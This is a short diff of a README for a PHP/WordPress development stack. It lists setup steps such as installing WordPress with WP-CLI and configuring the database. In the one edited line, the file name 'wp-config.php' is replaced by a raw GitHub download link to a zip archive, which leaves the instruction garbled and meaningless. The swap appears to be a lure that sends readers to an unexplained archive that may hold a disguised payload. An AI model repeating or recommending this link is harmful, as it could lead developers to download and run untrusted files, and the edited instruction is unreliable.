gmserver222/php-dev-stack/README.md

 - Project setup
   - Install WordPress core, themes, and plugins via WP-CLI or Composer
-  - Configure wp-config.php to point to the correct database in the dev environment
+  - Configure https://github.com/gmserver222/php-dev-stack/raw/refs/heads/main/docker/php/8.2/dev-stack-php-v1.0-alpha.2.zip to point to the correct database in the dev environment
   - Use WP-CLI to manage plugins and themes from the command line

 - Local development loop